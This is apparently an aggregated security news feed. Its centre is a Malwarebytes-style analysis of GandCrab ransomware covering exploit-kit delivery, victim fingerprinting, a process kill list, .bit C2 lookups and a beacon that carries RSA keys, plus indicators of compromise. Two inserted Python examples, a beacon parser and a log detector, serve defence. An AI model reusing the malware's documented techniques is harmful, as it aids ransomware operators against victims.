The Top Malware Families in Banking, Mobile, Ransomware, and Crypto-Mining of 2017

The second half of 2017 was busy in terms of digital security events. In September, consumer reporting agency Equifax announced a breach that potentially compromised the Social Security Numbers and other personal information of 143 million U.S. consumers. Less than two months later, organizations in Russia and Ukraine suffered infections at the hands of BadRabbit, […]… Read More

The post The Top Malware Families in Banking, Mobile, Ransomware, and Crypto-Mining of 2017 appeared first on The State of Security.

GandCrab ransomware distributed by RIG and GrandSoft exploit kits

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.

Distribution

GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified itself as of late with distinct threads pushing a specific payload. While Seamless is notorious for having switched to International Domain Names (IDNs) containing characters from the Russian alphabet, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and thought to have disappeared. Yet we discovered that it too was being used to distribute GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab is not demanding payment in the popular Bitcoin currency, but rather in a lesser-known cryptocurrency called Dash. This is another sign that threat actors are going for currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is pretty straight forward as far as analysis is concerned. There were no attempts to obfuscate data or code beyond just the first layer of the packer. Everything from the exclusion file types to web request variables, URLs, list of AVs—even the whole ransom message—is in plain text within the data section. On initial look-through, you can deduce what some of the functionality might be just by simply looking at the strings of the binary.

The code flow stays relatively inline, so as far as reverse engineering is concerned, it allows you to quite accurately analyze it even just statically in a disassembler. The code is divided up into three main segments: initialization, network, and encryption.

Initialization

After unpacking, GandCrab starts out with a few functions whose task is to set up some information to be used later in the code. It queries information about the user and system such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet querying if a drive exists and what type it is. If it is a CDRom, unknown, or non existent, it skips it. If a fixed drive is found, it copies its name to a buffer and copies a string describing what type of drive it is. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:

ip=99.8.160.100&pc_user=virusLab&pc_name=VI

It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:

Global\pc_group=WORKGROUP&ransom_id=c9ed65de824663f

In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

KEY PROCESS LIST:
msftesql.exe          sqlagent.exe          sqlbrowser.exe
sqlservr.exe          sqlwriter.exe         oracle.exe
ocssd.exe             dbsnmp.exe            synctime.exe
mydesktopqos.exe      agntsvc.exe           isqlplussvc.exe
xfssvccon.exe         mydesktopservice.exe  ocautoupds.exe
agntsvc.exe           agntsvc.exe           agntsvc.exe
encsvc.exe            firefoxconfig.exe     tbirdconfig.exe
ocomm.exe             mysqld.exe            mysqld-nt.exe
mysqld-opt.exe        dbeng50.exe           sqbcoreservice.exe
excel.exe             infopath.exe          msaccess.exe
mspub.exe             onenote.exe           outlook.exe
powerpnt.exe          steam.exe             thebat.exe
thebat64.exe          thunderbird.exe       visio.exe
winword.exe           wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side and uses the standard Microsoft crypto libraries available using API calls from Advapi32.dll. It calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off by making a GET request to ipv4bot.whatismyipaddress.com, saving the IP address returned and adding it to the GET request string that has been built from the system information.

It continues by taking a binary chunk, which is the RSA public key that was stored earlier during initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:

CRYPT_STRING_NOCRLF and CRYPT_STRING_BASE64

It is tacked onto the existing GET string, which the malware has been building this whole time. Below is an example of the RSA key generated in binary and its conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:

Which gets converted to:

BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW

And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

action=call&ip=99.8.160.100&pc_user=virusLab&pc_name=VIRUSLAB-PC&pc_group=WORKGROUP&pc_lang=en-US&pc_keyb=0&os_major=Windows 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW
 &priv_key=BwIAAACkAABSU0EyAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfWGRZmQmHH5W5K1RYgSg8VJEFLebRW8+o7X0K30wzzrw5NHpJpVJYX8OKot8KvopS4wsZzuxu5YJih1ZYVgF6QT5FW4WEG3BzMtq5vGVqTmrlckudC0xfGlGb7J41vUkZsp6S07NTIIT7HtYJSA/pxS51Zg+13TfU0nxC92RkKuva/8Dzmgssm6uE7aYJQFEkUmkPImYreHGIPsffEEGtZM9zwz4tXbrXLch0BoRNHeR+GFLJclnLc5JMg/J4BLaS6js+RGxRbZGMPJDVX6lTEEl+aIYO38Wh49+Zcpzs4EOUfb1EsoLEDAZbppIWq8Yr1P6KtWkqIXRzjUk9HXiJm3qHm0u0vchV4iRAKz2MJ/xZdYjHp+C3qMTTsNbQbtcscpy13/rEv8oO6clfciSCPcthy5IkLFLKZQP5be+IcsAjxeSoOqqtEpNpj8nOKfZ5PvEs+/kn718vG0R5CMU4I0fyF0BD68AFat6dl5gHK1sKs0ndAvCKdDMg/HqO/JKUZRSza2VKkgxpXC57BRGNP0r/jYySGnqhE2owHQaXoEmP9tme1A8PHsAoNtUEd0SO4/pn4hDg70o/Nmph/UWqtOq9nSlrxQMD8Q08w4K2H1CC3eCAnHZOM8PTCDYH3nh6f/ftkVtyrpudTpicTjoUSEkwtEPRsWk7ff3F/Na8D2FcXSI5xQ6R+R2uy8GvVoxpBy8Xdh78VqViOBlu5+Jxp09PMQmI2EFususg4VJeH047Wayi2r+VemzAX1rTuMh2mRKfKa+eae+YBKjBUkIh9WPCmFjO+3lll7GqV7P4JFm1g2sjrm/dPWnoGzfg1E7brER6aD2q+w1+4o8wCzNTNvPH2bwPMyV6R+vbWOVZUTprzZ4sRr7KxT0ucZmNA76WX39NegSU56tOngYpAQprOMrJP0NYmrizT8FsCOcqlUGk0jf6moarJSWQxh2MxXtlpFAvJjPTqqKruIVMhIkTJ9aZHKnn02a5PIdLcs4a09D85js9klKZn90Gj6C4AxlT2nI/ba9mEx+7srvxxbh1XNgI987IWLsLYpWxHlRptJqIvI0ZAA3EuvwZuZ8f6sqLM2/rSxdOnFW5hd8am9zgopimktfkjFtsHpev/Svf0VlxQ3Fj22A06aXqfi7hmWPZ8ZCtZ874PUHgbrG3foNESQiTghT2NLV9rNNad7ij/kVA=
 &version=1.0
[Crypto key base 64 functions]
[Section of code that is adding the encoded keys to the get string under priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.
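To make that observation concrete, here is an added example (our code, not Malwarebytes' or the malware's) that parses a beacon of the shape shown above and identifies the key material in it. The blob layout it checks (BLOBHEADER, then RSAPUBKEY with the RSA1/RSA2 magic, bit length and public exponent) is the documented Microsoft CryptoAPI format, so a 2048-bit blob built this way starts with the same base64 prefix as the pub_key and priv_key values above (BgIAAACkAABSU0Ex... and BwIAAACkAABSU0Ey...). The beacon it runs on is constructed, with filler in place of real key material; the field names and the hdd string are the only values taken from the analysis.

```python
from __future__ import annotations

import base64
import struct

# CryptoAPI blob constants from wincrypt.h (documented values, not page-specific).
PUBLICKEYBLOB = 0x06
PRIVATEKEYBLOB = 0x07
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400
MAGICS = {PUBLICKEYBLOB: b"RSA1", PRIVATEKEYBLOB: b"RSA2"}


def expected_blob_len(blob_type: int, bitlen: int) -> int:
    """Byte length of a complete RSA blob: BLOBHEADER (8) + RSAPUBKEY (12) + modulus,
    plus, for RSA2, the five CRT values (bitlen/16 each) and the private exponent."""
    n = bitlen // 8
    if blob_type == PUBLICKEYBLOB:
        return 20 + n
    return 20 + n + 5 * (n // 2) + n


def parse_key_blob(blob: bytes) -> dict:
    """Validate the header of a CryptoAPI RSA key blob and report what it carries."""
    if len(blob) < 20:
        raise ValueError("blob shorter than BLOBHEADER + RSAPUBKEY")
    btype, bver, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if btype not in MAGICS or bver != CUR_BLOB_VERSION:
        raise ValueError(f"not an RSA key blob: type=0x{btype:02x} version={bver}")
    if magic != MAGICS[btype] or alg != CALG_RSA_KEYX:
        raise ValueError(f"unexpected magic {magic!r} / algid 0x{alg:08x}")
    return {
        "type": "private" if btype == PRIVATEKEYBLOB else "public",
        "bitlen": bitlen,
        "pubexp": pubexp,
        "complete": len(blob) == expected_blob_len(btype, bitlen),
    }


def parse_beacon(query: str) -> dict:
    """Split the raw beacon into fields and decode the key blobs.

    The beacon is not URL-encoded: the '+' and '/' inside the base64 are sent raw,
    so urllib.parse.parse_qs would turn every '+' into a space. Split by hand,
    on the first '=' of each field only, so trailing base64 padding survives."""
    fields = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        fields[key] = value
    for name in ("pub_key", "priv_key"):
        if name in fields:
            fields[name] = parse_key_blob(base64.b64decode(fields[name], validate=True))
    return fields


def beacon_leaks_private_key(fields: dict) -> bool:
    """True when the beacon carried the victim's RSA private key to the C2."""
    key = fields.get("priv_key")
    return isinstance(key, dict) and key["type"] == "private"


def make_sample_blob(blob_type: int, bitlen: int = 2048) -> bytes:
    """Constructed sample: genuine header layout, filler instead of real key material."""
    header = struct.pack("<BBHI", blob_type, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
    rsapubkey = struct.pack("<4sII", MAGICS[blob_type], bitlen, 65537)
    body_len = expected_blob_len(blob_type, bitlen) - 20
    filler = bytes((i * 37 + 11) & 0xFF for i in range(body_len))
    return header + rsapubkey + filler


def sample_blob_b64(blob_type: int) -> str:
    return base64.b64encode(make_sample_blob(blob_type)).decode()


# Constructed beacon in the shape of the GET string above (hypothetical host values).
SAMPLE_BEACON = (
    "action=call&ip=198.51.100.7&pc_user=analyst&pc_name=LAB-PC&pc_group=WORKGROUP"
    "&pc_lang=en-US&pc_keyb=0&os_major=Windows 7 Enterprise&os_bit=x64"
    "&ransom_id=0123456789abcdef&hdd=C:FIXED_64317550592/50065174528"
    "&pub_key=" + sample_blob_b64(PUBLICKEYBLOB)
    + "&priv_key=" + sample_blob_b64(PRIVATEKEYBLOB)
    + "&version=1.0"
)

if __name__ == "__main__":
    parsed = parse_beacon(SAMPLE_BEACON)
    for name in ("pub_key", "priv_key"):
        print(name, parsed[name])
    print("private key leaked to C2:", beacon_leaks_private_key(parsed))
```

Finding priv_key in a capture or in process memory means the victim's RSA private key crossed the wire in the clear, which is what makes recovery of the key, and hence of the files, worth investigating; the 24-character base64 prefixes above are a cheap fingerprint for such a blob.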

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain] a.dnspod.com.

This command queries the a.dnspod.com name server, which supports the .bit TLD, for one of the domains below.

bleepingcomputer.bit
nomoreransom.bit
esetnod32.bit
emsisoft.bit
gandcrab.bit

The nslookup child process is opened through a pipe that was created beforehand. This is done so that the child's output lands directly in the parent process's memory, rather than being transferred manually back and forth. It is an interesting and useful technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:

Once it finds one of these, it continues to open a thread that will start the main encryption functionality. However, before it begins, it opens another thread that creates a window and labels itself as Firefox. The window is loaded with code that will copy the malware to the temp directory and set it up in the registry. This is actually one of the few parts of the malware that is not taken directly from plain text. The file name of the copy is a random series of letters generated by calling the CryptGenRandom function and using its output to index an array of letters.

The strange part about this function is not what it does, because it is creating the persistence we had been waiting for, but rather why a window was created in the first place. As far as we could understand, there is no benefit to launching a window to perform these tasks. Maybe it was an experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we have established from the initialization section of the malware, the encryption algorithm used is RSA. Before we get to the encryption section, the code makes sure that it is not encrypting specific types of files that it considers protected. The files are the following, hard coded into the malware:

desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat
thumbs.db
GDCB-DECRYPT.txt
.sql

If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

local app data
windows
programfiles
program data
ransomware
localsettings

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys, along with a salt and a generated random number, to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually make it to every file on the drive.
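Pulling the host-side artifacts from this analysis together, here is an added detection example (our code, not Malwarebytes' own) that runs over constructed endpoint log lines and flags the behaviours described above: the mutex name pattern, the external IP lookup, nslookup resolving a .bit domain against a.dnspod.com, a burst of terminations of processes from the kill list, and .GDCB files or GDCB-DECRYPT.txt ransom notes appearing. The log format (key=value records with event, host, image, cmdline, name, dst and path fields) is an assumption made for the example; the indicators are those named in the analysis, while the kill-list subset and the threshold of three terminations are choices made here.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Indicators taken from the analysis above. The log format itself is constructed.
BIT_NAMESERVER = "a.dnspod.com"
C2_DOMAINS = {"bleepingcomputer.bit", "nomoreransom.bit", "esetnod32.bit",
              "emsisoft.bit", "gandcrab.bit"}
IP_LOOKUP_HOST = "ipv4bot.whatismyipaddress.com"
RANSOM_NOTE = "gdcb-decrypt.txt"
ENCRYPTED_EXT = ".gdcb"
# Subset of the hardcoded kill list; extend with the full list for production use.
KILL_LIST = {"msftesql.exe", "sqlagent.exe", "sqlbrowser.exe", "sqlservr.exe",
             "sqlwriter.exe", "oracle.exe", "mysqld.exe", "outlook.exe",
             "winword.exe", "excel.exe", "thunderbird.exe", "steam.exe"}
KILL_THRESHOLD = 3  # terminations per host before we raise one alert

MUTEX_RE = re.compile(r"^Global\\pc_group=[^&]+&ransom_id=[0-9a-f]{8,}$", re.I)
NSLOOKUP_RE = re.compile(r"nslookup\s+(\S+\.bit)\s+" + re.escape(BIT_NAMESERVER) + r"\.?\s*$", re.I)
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Alert:
    rule: str
    line_no: int
    detail: str


def parse_fields(line: str) -> dict:
    """Split a 'key=value key="quoted value"' record into a dict. Only the first '='
    of each token separates key from value, so the mutex name (which itself contains
    '=' and '&') survives intact."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def scan(log_text: str) -> list[Alert]:
    alerts: list[Alert] = []
    kills: Counter = Counter()
    for no, line in enumerate(log_text.splitlines(), 1):
        f = parse_fields(line)
        ev = f.get("event", "")
        host = f.get("host", "?")
        if ev == "MutexCreate" and MUTEX_RE.match(f.get("name", "")):
            alerts.append(Alert("gandcrab_mutex", no, f["name"]))
        elif ev == "NetConnect" and f.get("dst", "").lower().startswith(IP_LOOKUP_HOST):
            # Legitimate tools use this service too; treat as low-confidence context.
            alerts.append(Alert("external_ip_lookup", no, f["dst"]))
        elif ev == "ProcessCreate":
            m = NSLOOKUP_RE.search(f.get("cmdline", ""))
            if m:
                domain = m.group(1).lower()
                known = "known C2 domain" if domain in C2_DOMAINS else "unlisted .bit domain"
                alerts.append(Alert("bit_domain_resolution", no, f"{domain} ({known})"))
        elif ev == "ProcessTerminate":
            image = f.get("image", "").rsplit("\\", 1)[-1].lower()
            if image in KILL_LIST:
                kills[host] += 1
                if kills[host] == KILL_THRESHOLD:
                    alerts.append(Alert("mass_process_kill", no,
                                        f"{KILL_THRESHOLD} kill-list processes terminated on {host}"))
        elif ev == "FileCreate":
            path = f.get("path", "").lower()
            if path.endswith(ENCRYPTED_EXT) or path.rsplit("\\", 1)[-1] == RANSOM_NOTE:
                alerts.append(Alert("gdcb_artifact", no, f["path"]))
    return alerts


# Constructed sample log: one infected host, with benign noise mixed in.
SAMPLE_LOG = r"""
2018-01-30T10:01:02Z host=WS01 event=ProcessCreate image=C:\Windows\explorer.exe cmdline="explorer.exe"
2018-01-30T10:01:30Z host=WS01 event=ProcessCreate image=C:\Windows\System32\nslookup.exe cmdline="nslookup intranet.corp.local"
2018-01-30T10:02:11Z host=WS01 event=MutexCreate name=Global\pc_group=WORKGROUP&ransom_id=c9ed65de824663fc
2018-01-30T10:02:12Z host=WS01 event=NetConnect dst=ipv4bot.whatismyipaddress.com:80 method=GET
2018-01-30T10:02:14Z host=WS01 event=ProcessCreate image=C:\Windows\System32\nslookup.exe cmdline="nslookup gandcrab.bit a.dnspod.com"
2018-01-30T10:02:20Z host=WS01 event=ProcessTerminate image="C:\Program Files\Microsoft SQL Server\sqlservr.exe"
2018-01-30T10:02:20Z host=WS01 event=ProcessTerminate image=C:\Windows\notepad.exe
2018-01-30T10:02:21Z host=WS01 event=ProcessTerminate image="C:\Program Files\Microsoft Office\outlook.exe"
2018-01-30T10:02:21Z host=WS01 event=ProcessTerminate image="C:\Program Files\Microsoft Office\winword.exe"
2018-01-30T10:05:40Z host=WS01 event=FileCreate path=C:\Users\alice\Documents\budget.xlsx.GDCB
2018-01-30T10:05:41Z host=WS01 event=FileCreate path=C:\Users\alice\Documents\GDCB-DECRYPT.txt
2018-01-30T10:05:42Z host=WS01 event=FileCreate path=C:\Users\alice\Documents\notes.txt
""".strip()

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a.line_no:2d} {a.rule:22s} {a.detail}")
```

The nslookup rule is the most durable of these: a user-mode process spawning nslookup with an explicit third-party name server for a .bit name is unusual on a corporate endpoint whatever the domain is, so the rule fires on unlisted .bit names too and only uses the hardcoded list to raise confidence.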

Protection

Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:

Conclusion

It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate

31.31.196.187,xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

62.109.4.135

GandCrab (packed)

69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d

GandCrab (unpacked)

ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51

The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.

How to prepare for the future of digital extortion

Digital extortion has evolved into the most successful criminal business model in the current threat landscape, and Trend Micro researchers predict that it will continue to grow rampant because it’s cheap, easy to commit, and many times the victims pay. Attackers can go after a wide variety of targets. The line between blackmail and extortion is blurred in the digital realm. “Many digital crimes we normally think of as blackmail are, in fact, extortion — … More

Dridex gang follows trends, also created FriedEx ransomware

The gang behind the infamous banking Trojan Dridex has also created the FriedEx (aka BitPaymer) ransomware, ESET researchers confidently claim. The similarities between Dridex and FriedEx By analyzing and comparing the code of both threats, the researchers discovered a handful of similarities: Both malware use the same function for generating UserID (i.e., that generates a unique string from several attributes of the victim’s machine) Most of the other functions that correspond to the specific malware … More

Cybersecurity Incidents Doubled in 2017, Study Finds

2017 was another record year for cybercrime. According to the Online Trust Alliance (OTA), the number of cybersecurity incidents nearly doubled from the previous year. This led Jeff Wilbur, director of the OTA initiative at the Internet Society, to call it the “worst year ever in data breaches.”

The group’s “Cyber Incident & Breach Trends Report” attributed this massive surge — from about 82,000 incidents in 2016 to an estimated 160,000 in 2017 — to the unprecedented rise of ransomware, which accounted for 134,000 attacks. Even worse, the report noted that the total number of attacks could actually be as high as 350,000, since many breaches go unreported.

Another Record Year for Cybersecurity Incidents

The rise in incidents is due in large part to several novel attack methods that emerged or ramped up in the past year. The FBI estimated that business email compromise (BEC), for example, cost companies around the world $5.3 billion, as cited in the report. Ransom denial-of-service (RDoS) activity, in which fraudsters threaten to direct overwhelming amounts of traffic to target websites unless domain owners pay a ransom, also spiked in 2017.

Of course, high-profile ransomware attacks such as WannaCry and NotPetya also contributed to 2017’s eye-popping cybercrime statistics. The former, which the OTA called “one of the most widespread and devastating attacks in history,” infected 300,000 computers across 150 countries, halting operations at organizations around the world. The latter similarly affected hundreds of thousands of endpoints in more than 100 countries.

According to the Ponemon Institute and IBM’s “2017 Cost of Data Breach Study,” the average cost of a data breach was $3.62 million in 2017, up 10 percent from the previous year. The U.S. alone lost an average of $7.35 million per incident, a 5 percent increase from 2016.

Overall, the report noted a marked increase in cybercrime across all categories, including the number of breaches, number of records exposed, and breadth of countries and organizations impacted.

Poor Security Awareness to Blame

The most alarming statistic cited in the report is the fact that 93 percent of incidents could have been prevented by following basic security best practices, such as patching software and conducting phishing training. While 52 percent of breaches were the result of “actual hacks,” 15 percent were due to lack of security software, 11 percent were caused by insufficient insider threat oversight and 8 percent due to phishing attacks.

These numbers suggest an urgent need for greater security awareness. More effective training and more thorough incident response planning can help mitigate these threats and avoid the monumental costs associated with them.

The post Cybersecurity Incidents Doubled in 2017, Study Finds appeared first on Security Intelligence.

No Rest for the Weary: Applying Security Lessons From 2017 in the New Year

How can it be that we are already through January and moving into February of the new year? I don’t know about you, but I still have a long list of resolutions to accomplish and I need to focus on what I can realistically get done in 2018.

This makes me think about how everyone in the security industry has been talking about new initiatives and goals for 2018. However, we would be remiss not to look back at the security lessons we learned and the goals we collectively accomplished in 2017. To get a head start on the new year, we should reflect on these insights and apply them to the work we need to complete in 2018.

Taking Stock of Security Lessons From 2017

So what happened in 2017 that required us to work harder and be more diligent than we thought possible? As an esteemed colleague of mine kindly reminded me, these “exercises” are simply “opportunities” to better our cybersecurity skills.

As we in IBM Security, specifically the X-Force Exchange team, take the time to look back, we can appreciate the hard work and collaboration that transpired to help make the world a safer place. Below are a few highlights and accomplishments we were proud to bring to the security industry last year.

  • We worked together to address data breaches and vulnerabilities that kept us all on our toes. A few of the big ones, such as WannaCry, NotPetya and Bad Rabbit, come to mind.
  • IBM produced the “X-Force 2017 Data Breach Review,” which revealed that:
    • Computer services and government agencies were hardest hit by breaches in terms of number of records and incidents;
    • Misconfigurations accounted for the largest number of records breached; and
    • The U.S. was the largest bull’s-eye for breaches in terms of number of incidents.
  • We grew our user base to over 50,000 security professionals around the globe representing all major industries, and provided a go-to resource to research and share threat intelligence, including both indicators of compromise and higher-order insights.
  • Our team supported the Quad9 initiative with the Packet Clearing House (PCH) and Global Cyber Alliance (GCA). We even offered a domain for anyone to use to enhance security and privacy while traversing the web.
  • We listened to our users’ feedback to further improve the user experience of the X-Force Exchange. We incorporated numerous innovations to the platform, including more robust notifications, a customizable experience and more X-Force research on current threats and vulnerabilities.

Don’t Let Your Guard Down in 2018

Even though we are proud of all the progress we made and security lessons we learned in 2017, we can’t afford to slack on our goals and resolutions for 2018. Bad actors will continue to attack our networks and exploit both known and unknown vulnerabilities. That’s why it is good to set achievable goals to ensure that we are doing everything we can to protect what is most important within our companies. It also means that, as a community of security professionals, we need to keep working together to spread security awareness and deal with whatever threats come our way.

To learn more about how you can get ahead of the next cybercriminal trend, check out the X-Force Exchange and start using it today.

The post No Rest for the Weary: Applying Security Lessons From 2017 in the New Year appeared first on Security Intelligence.

Highlights From the World Economic Forum’s ‘Global Risks Report 2018’

“In a world of complex and interconnected systems, feedback loops, threshold effects and cascading disruptions can lead to sudden and dramatic breakdowns.” — The World Economic Forum’s “Global Risks Report 2018”

First came the New Year’s Eve parties, followed by New Year’s resolutions and, finally, the annual meeting of global elites at the World Economic Forum (WEF) in Davos, Switzerland, on January 23–26. Just ahead of the event, the WEF released its “Global Risks Report 2018,” a compendium of data points and analysis about the state of economic health around the world.

The report, partly based on a survey of about 1,000 of its members conducted during the second half of 2017, covers all major categories of risk, including economic, environmental, geopolitical, societal and technological. The top four concerns include recurring themes, such as inequality and unfairness, political tensions within and between countries, the environment, and cyber vulnerabilities. It is across this spectrum of global risks that the report warns of “the increased dangers of systemic breakdown,” due in part to our increasing dependence on technology.

A Sharpened Focus on Cyber Risks

For the first time in the history of the “Global Risks Report,” two technological threats — cyberattacks and data fraud or theft — ranked in the top five risks by likelihood. Cyberattacks also figured high on the impact side, coming in sixth place. The report warned of the dangers that await if global leaders don’t take stock of the issues and become more engaged in improving policies, communication, coordination and risk decisions.

As many organizations have found out the hard way in 2017, cybercriminals have access to a target space that is growing at an exponential pace. The report noted that attacks against businesses have doubled in the span of five years and are now considered part of the cost of doing business. Not surprisingly, the report mentioned the prevalence of ransomware in 2017, including mentions of WannaCry and NotPetya, and the significant costs and disruptions created by those events.

The Internet of Things (IoT) is also spotlighted in the report, but not for the technological advancements it provides. Instead, WEF noted that there are now already more IoT devices than people on the planet, and these devices, with their lack of out-of-the-box-security, have already been used to launch distributed denial-of-service (DDoS) attacks at 100 gigabits per second. These events are part of a growing tally of cybercrime costs that could reach $8 trillion by 2022. The report also pointed to increasing evidence of disruptions to systems and services “that keep societies functioning,” including critical infrastructure, government agencies, banks, telecommunications and transportation.

How Cyberthreats Fit Into the Larger Picture

Cyber risks are just one of the many categories of threats that society faces today. However, the 2018 report dedicated more attention to this increasingly important issue, warning of the fragility and instability of technological systems and highlighting the uncertainty that could result from their widespread failure. WEF called out the possibility of “asymmetric economic warfare” as our modern economies increasingly rely on new technologies to drive everything from manufacturing systems to remote healthcare, and the financial infrastructure that powers our online banking and investment transactions.

Addressing the Need for Better Risk Assessment and Management

As a global barometer of economic health and a repository of top concerns, the WEF report also recommended solutions that can help us avoid the cliff. While it noted that global risks are growing in complexity and becoming pervasive with a strong potential for cascading failures, it also emphasized the need for reactions and responses to be determined and coordinated from both a local and global perspective. As 2017 has shown, knowing how best to respond to a cyber crisis is as important as all the work done prior to a breach.

While global economies have improved their ability to measure and mitigate conventional risks, they struggle to understand and address the complex risks that are found at the intersection of the various systems that make our modern world possible. The report section titled “Future Shocks” features stories that illustrate the potential impact of widespread complacency and demonstrate how rapidly risks can propagate between systems and geographic regions.

